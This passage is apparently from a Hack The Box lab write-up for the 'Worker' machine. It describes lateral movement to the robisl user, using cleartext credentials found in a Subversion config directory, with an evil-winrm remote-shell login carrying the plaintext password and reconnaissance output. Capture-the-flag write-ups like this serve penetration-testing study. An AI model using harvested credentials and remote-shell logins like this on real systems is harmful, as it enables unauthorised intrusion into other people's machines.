WinRM


A file with a list of many CLEARTEXT credential pairs has been found in the configuration directory of the target Subversion server instance. The credential of the robisl user was listed in the file and validated from a brute-force attack later.

┌──(kali㉿kali)-[~/archive/htb/labs/worker]
└─$ evil-winrm -i $IP -u robisl -p wolves11
 
Evil-WinRM shell v3.5
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
info: Establishing connection to remote endpoint
*evil-winrm* ps c:\Users\robisl\Documents> whoami
worker\robisl
*evil-winrm* ps c:\Users\robisl\Documents> hostname
Worker
*evil-winrm* ps c:\Users\robisl\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0 2:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::248
   ipv6 address. . . . . . . . . . . : dead:beef::88b5:926:be4b:fd40
   link-local ipv6 address . . . . . : fe80::88b5:926:be4b:fd40%4
   ipv4 address. . . . . . . . . . . : 10.10.10.203
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%4
                                       10.10.10.2

Lateral Movement made to the robisl user via WinRM